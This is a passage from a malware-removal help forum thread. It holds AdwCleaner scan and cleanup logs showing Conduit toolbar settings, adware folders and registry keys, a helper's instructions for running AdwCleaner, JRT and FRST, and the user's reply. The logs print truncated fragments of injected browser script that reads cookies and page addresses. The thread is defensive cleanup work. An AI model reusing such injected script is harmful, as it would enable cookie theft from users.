Line Found : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\prefs.js ]


[ File : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\prefs.js ]

Line Found : user_pref("CT3074349..clientLogIsEnabled", true);
Line Found : user_pref("CT3074349..clientLogServiceUrl", "hxxp://clientlog.users.conduit.com/ClientDiagnostics.asmx/ReportDiagnosticsEvent");
Line Found : user_pref("CT3074349..uninstallLogServiceUrl", "hxxp://uninstall.users.conduit.com/Uninstall.asmx/RegisterToolbarUninstallation");
Line Found : user_pref("CT3074349.AboutPrivacyUrl", "hxxp://www.conduit.com/privacy/Default.aspx");
Line Found : user_pref("CT3074349.CTID", "CT3074349");
Line Found : user_pref("CT3074349.CurrentServerDate", "16-9-2011");
Line Found : user_pref("CT3074349.DialogsAlignMode", "LTR");
Line Found : user_pref("CT3074349.DialogsGetterLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.DownloadReferralCookieData", "");
Line Found : user_pref("CT3074349.FirstServerDate", "15-9-2011");
Line Found : user_pref("CT3074349.FirstTime", true);
Line Found : user_pref("CT3074349.FirstTimeFF3", true);
Line Found : user_pref("CT3074349.FixPageNotFoundErrors", true);
Line Found : user_pref("CT3074349.GroupingServerCheckInterval", 1440);
Line Found : user_pref("CT3074349.GroupingServiceUrl", "hxxp://grouping.services.conduit.com/");
Line Found : user_pref("CT3074349.HasUserGlobalKeys", true);
Line Found : user_pref("CT3074349.Initialize", true);
Line Found : user_pref("CT3074349.InitializeCommonPrefs", true);
Line Found : user_pref("CT3074349.InstallationAndCookieDataSentCount", 2);
Line Found : user_pref("CT3074349.InstallationType", "UnknownIntegration");
Line Found : user_pref("CT3074349.InstalledDate", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.InvalidateCache", false);
Line Found : user_pref("CT3074349.IsGrouping", false);
Line Found : user_pref("CT3074349.IsInitSetupIni", true);
Line Found : user_pref("CT3074349.IsMulticommunity", false);
Line Found : user_pref("CT3074349.IsOpenThankYouPage", false);
Line Found : user_pref("CT3074349.IsOpenUninstallPage", true);
Line Found : user_pref("CT3074349.LanguagePackLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.LanguagePackReloadIntervalMM", 1440);
Line Found : user_pref("CT3074349.LanguagePackServiceUrl", "hxxp://translation.users.conduit.com/Translation.ashx");
Line Found : user_pref("CT3074349.LastLogin_3.6.0.10", "Thu Sep 15 2011 20:24:45 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.LatestVersion", "3.6.0.10");
Line Found : user_pref("CT3074349.Locale", "en");
Line Found : user_pref("CT3074349.MCDetectTooltipHeight", "83");
Line Found : user_pref("CT3074349.MCDetectTooltipUrl", "hxxp://@EB_INSTALL_LINK@/rank/tooltip/?version=1");
Line Found : user_pref("CT3074349.MCDetectTooltipWidth", "295");
Line Found : user_pref("CT3074349.MyStuffEnabledAtInstallation", true);
Line Found : user_pref("CT3074349.OriginalFirstVersion", "3.6.0.10");
Line Found : user_pref("CT3074349.RadioIsPodcast", false);
Line Found : user_pref("CT3074349.RadioLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.RadioLastUpdateIPServer", "3");
Line Found : user_pref("CT3074349.RadioLastUpdateServer", "3");
Line Found : user_pref("CT3074349.RadioMediaID", "9962");
Line Found : user_pref("CT3074349.RadioMediaType", "Media Player");
Line Found : user_pref("CT3074349.RadioMenuSelectedID", "EBRadioMenu_CT30743499962");
Line Found : user_pref("CT3074349.RadioShrinkedFromSetup", false);
Line Found : user_pref("CT3074349.RadioStationName", "California%20Rock");
Line Found : user_pref("CT3074349.RadioStationURL", "hxxp://feedlive.net/california.asx");
Line Found : user_pref("CT3074349.SavedHomepage", "about:blank");
Line Found : user_pref("CT3074349.SearchFromAddressBarIsInit", true);
Line Found : user_pref("CT3074349.SearchInNewTabEnabled", true);
Line Found : user_pref("CT3074349.SearchInNewTabIntervalMM", 1440);
Line Found : user_pref("CT3074349.SearchInNewTabLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SearchInNewTabServiceUrl", "hxxp://newtab.conduit-hosting.com/newtab/?ctid=EB_TOOLBAR_ID");
Line Found : user_pref("CT3074349.SearchInNewTabUsageUrl", "hxxp://Usage.Hosting.conduit-services.com/UsageService.asmx/UsersRequests?ctid=EB_TOOLBAR_ID");
Line Found : user_pref("CT3074349.SearchInNewTabUserEnabled", false);
Line Found : user_pref("CT3074349.SearchProtectorToolbarDisabled", true);
Line Found : user_pref("CT3074349.ServiceMapLastCheckTime", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SettingsLastCheckTime", "Thu Sep 15 2011 20:24:41 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SettingsLastUpdate", "1314715212");
Line Found : user_pref("CT3074349.ThirdPartyComponentsInterval", 504);
Line Found : user_pref("CT3074349.ThirdPartyComponentsLastCheck", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.ThirdPartyComponentsLastUpdate", "1312887586");
Line Found : user_pref("CT3074349.ToolbarDisabled", false);
Line Found : user_pref("CT3074349.ToolbarShrinkedFromSetup", false);
Line Found : user_pref("CT3074349.TrusteLinkUrl", "hxxp://trust.conduit.com/CT3074349");
Line Found : user_pref("CT3074349.TrustedApiDomains", "conduit.com,conduit-hosting.com,conduit-services.com,client.conduit-storage.com,OurToolbar.com,CommunityToolbars.com,ForumToolbar.com,MyBlogToolbar.com,MyCity[...]
Line Found : user_pref("CT3074349.Uninstall", true);
Line Found : user_pref("CT3074349.UserID", "UN72577828490742812");
Line Found : user_pref("CT3074349.WeatherNetwork", "");
Line Found : user_pref("CT3074349.WeatherPollDate", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.WeatherUnit", "F");
Line Found : user_pref("CT3074349.alertChannelId", "1465784");
Line Found : user_pref("CT3074349.generalConfigFromLogin", "{\"ApiMaxAlerts\":\"12\",\"SocialDomains\":\"social.conduit.com;apps.conduit.com;services.apps.conduit.com\",\"AppsDetectionUrlPattern\":\"hxxp://appdown[...]
Line Found : user_pref("CT3074349.globalFirstTimeInfoLastCheckTime", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.homepageProtectorEnableByLogin", true);
Line Found : user_pref("CT3074349.initDone", true);
Line Found : user_pref("CT3074349.isAppTrackingManagerOn", true);
Line Found : user_pref("CT3074349.isFirstRadioInstallation", false);
Line Found : user_pref("CT3074349.myStuffEnabled", true);
Line Found : user_pref("CT3074349.myStuffPublihserMinWidth", 400);
Line Found : user_pref("CT3074349.myStuffSearchUrl", "hxxp://Apps.conduit.com/search?q=SEARCH_TERM&SearchSourceOrigin=29&ctid=EB_TOOLBAR_ID&octid=EB_ORIGINAL_CTID");
Line Found : user_pref("CT3074349.myStuffServiceIntervalMM", 1440);
Line Found : user_pref("CT3074349.myStuffServiceUrl", "hxxp://mystuff.conduit-services.com/MyStuffService.ashx?ComponentId=EB_MY_STUFF_INSTANCE_GUID&lut=EB_MY_STUFF_LUT");
Line Found : user_pref("CT3074349.oldAppsList", "129446538071425236,129574421762864744,111,129574421763479940,1000082,129574421763997487,1000234,129574421764495504,129574421764505270,129574421764515036,1000034,100[...]
Line Found : user_pref("CT3074349.searchProtectorDialogDelayInSec", 10);
Line Found : user_pref("CT3074349.searchProtectorEnableByLogin", true);
Line Found : user_pref("CT3074349.testingCtid", "");
Line Found : user_pref("CT3074349.toolbarAppMetaDataLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.toolbarContextMenuLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.usagesFlag", 1);
Line Found : user_pref("CommunityToolbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3074349&SearchSource=13");
Line Found : user_pref("CommunityToolbar.ConduitSearchList", "PhotoJoy US Customized Web Search,uTorrentControl2 Customized Web Search");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://Settings.toolbar.search.conduit.com/root/CT3072253/CT3072253", "\"76b4669a117e81f713161171f6d50d821\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1463702/1459356/US", "\"0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1465784/1461438/US", "\"0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3072253", "\"1336063965\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3074349", "\"1312968577\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=GottenApps&locale=en", "C5ZJe6gL80JBW5CuLy+wkg==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=OtherApps&locale=en", "2E1/v7EfCEDbv3VaBQMELg==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=SharedApps&locale=en", "k9un27OkAvkwB2ZmvXxTnA==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=Toolbar&locale=en", "4BgM4MhF/sOgPsDNmIs3Yw==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.alert.conduit-services.com/alert/dlg.pkg", "\"8076e3ce381dcd1:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.13.0.6", "\"4ead38b3e6bcd1:145a\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.6.0.10", "\"80ee9485875dcc1:1192\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3072253", "\"d76323372b05c3748a3d6b1c93a98292\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3074349", "\"634515122457000000\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://settings.toolbar.conduit-services.com/?ctid=CT3074349&octid=CT3074349", "\"1314715212\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/equalizer_dead.gif", "\"03e383867bc91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/minimize.gif", "\"0e685fa27bc91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/play.gif", "\"02faea337c7c91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/stop.gif", "\"03a54d7f47ac91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/vol.gif", "\"049b47644c7c91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://translation.toolbar.conduit-services.com/?locale=en", "\"1c8884e1d7013beea7adb5fd75562429\"");
Line Found : user_pref("CommunityToolbar.LatestLibsPath", "file:///C:\\Users\\Nick\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ghs5oui9.default\\conduitCommon\\modules\\3.13.0.6");
Line Found : user_pref("CommunityToolbar.LatestToolbarVersionInstalled", "3.13.0.6");
Line Found : user_pref("CommunityToolbar.SearchFromAddressBarSavedUrl", "hxxp://www.bing.com/search?pc=Z016&form=ZGAADF&q=");
Line Found : user_pref("CommunityToolbar.ToolbarsList", "CT3074349");
Line Found : user_pref("CommunityToolbar.ToolbarsList2", "CT3074349");
Line Found : user_pref("CommunityToolbar.ToolbarsList4", "CT3074349");
Line Found : user_pref("CommunityToolbar.globalUserId", "cc216d56-d7ed-4ac3-8282-651bea8138ff");
Line Found : user_pref("CommunityToolbar.isAlertUrlAddedToFeedItemTable", true);
Line Found : user_pref("CommunityToolbar.isClickActionAddedToFeedItemTable", true);
Line Found : user_pref("CommunityToolbar.keywordURLSelectedCTID", "CT3072253");
Line Found : user_pref("CommunityToolbar.notifications.alertDialogsGetterLastCheckTime", "Fri Jun 08 2012 00:17:45 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.alertEnabled", true);
Line Found : user_pref("CommunityToolbar.notifications.alertInfoInterval", 1440);
Line Found : user_pref("CommunityToolbar.notifications.alertInfoLastCheckTime", "Fri Jun 08 2012 12:36:14 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.clientsServerUrl", "hxxp://alert.client.conduit.com");
Line Found : user_pref("CommunityToolbar.notifications.locale", "en");
Line Found : user_pref("CommunityToolbar.notifications.loginIntervalMin", 1440);
Line Found : user_pref("CommunityToolbar.notifications.loginLastCheckTime", "Fri Jun 08 2012 00:17:44 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.loginLastUpdateTime", "1313487611");
Line Found : user_pref("CommunityToolbar.notifications.messageShowTimeSec", 20);
Line Found : user_pref("CommunityToolbar.notifications.servicesServerUrl", "hxxp://alert.services.conduit.com");
Line Found : user_pref("CommunityToolbar.notifications.showTrayIcon", false);
Line Found : user_pref("CommunityToolbar.notifications.userCloseIntervalMin", 300);
Line Found : user_pref("CommunityToolbar.notifications.userId", "5da594d4-182c-41cf-960d-e9dcf87f3b75");
Line Found : user_pref("CommunityToolbar.originalHomepage", "hxxp://www.google.com/");
Line Found : user_pref("CommunityToolbar.originalSearchEngine", "chrome://browser-region/locale/region.properties");
Line Found : user_pref("browser.search.defaultthis.engineName", "uTorrentControl2 Customized Web Search");
Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Bill\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Found [Extension] : flpcjncodpafbgdpnkljologafpionhb

[ File : C:\Users\Dylan\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\Hannah\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3319598&octid=EB_ORIGINAL_CTID&ISID=M180E7AAF-7B0C-4944-94F1-C3AD338C4DD6&SearchSource=58&CUI=&UM=5&UP=SP9F1267DC-924A-4FA2-8BD3-B25688915483&q={searchTerms}&SSPV=

[ File : C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [30957 octets] - [01/11/2014 10:55:50]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [31018 octets] ##########
 



Edited by topper8281, 01 November 2014 - 01:11 PM.


#6 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 01:14 PM

Hello topper8281,

Double click on AdwCleaner.exe to run the tool again.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove". Look through the scan results and uncheck any entries that you do not wish to remove.
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

***


Please download Junkware Removal Tool from HERE and save it to your desktop.
Shut down your antivirus to avoid any potential conflicts.
Double click JRT.exe to run the tool.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • JRT will begin to backup your registry and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, the log JRT.txt is saved on your desktop and will automatically open.
Enable your antivirus!
Post the contents of JRT.txt into your next reply.


***


Run the Farbar Recovery Scan Tool again.
  • Double-click to run FRST / FRST64. When the tool opens, click Yes to the disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

***


How is the computer running now?


***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#7 topper8281


Posted 01 November 2014 - 02:19 PM

Hey Jo. Internet Explorer, Opera, and Firefox seem to be running just fine now. But when I open Google Chrome I get suspicious looking advertisements, and fake notification boxes. I've uploaded a few of these pictures to this post so you can see it for yourself. Here are the rest of the logs you requested. The addition file that is attached is from the first time I ran FRST, not the latest.

 

 

# AdwCleaner v3.311 - Report created 01/11/2014 at 11:31:44
# Updated 30/09/2014 by Xplode
# Operating System : Windows Vista ™ Ultimate Service Pack 2 (32 bits)
# Username : Nick - WALKER-PC
# Running from : C:\Users\Nick\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : ca82e1a5

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\FlaashCoupon
Folder Deleted : C:\ProgramData\QueenCoupioon
Folder Deleted : C:\ProgramData\SaalesCheckEr
Folder Deleted : C:\ProgramData\SaLesChheckueR
Folder Deleted : C:\ProgramData\SaveItCoupons
Folder Deleted : C:\ProgramData\Webusavveer
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\optimizer pro v3.2
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\Optimizer Pro
Folder Deleted : C:\Program Files\Search Toolbar
Folder Deleted : C:\Users\Bill\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Hannah\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Optimizer Pro
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Search Protection
Folder Deleted : C:\Users\Hannah\Documents\Optimizer Pro
Folder Deleted : C:\Users\Nick\AppData\Local\Conduit
Folder Deleted : C:\Users\Nick\AppData\Local\Temp\rightsurf
Folder Deleted : C:\Users\Nick\AppData\Roaming\registry mechanic
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\ConduitCommon
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\StumbleUpon
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3072253
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Zugo
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Toolbar
Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\ImInstaller
Key Deleted : HKLM\SOFTWARE\PIP
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Optimizer Pro_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SearchProtect
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~1\optimi~1\optpro~2.dll

***** [ Browsers ] *****

-\\ Internet Explorer v7.0.6002.18005


-\\ Mozilla Firefox v33.0 (x86 en-US)

[ File : C:\Users\Bill\AppData\Roaming\Mozilla\Firefox\Profiles\klr418dz.default-1405037272113\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
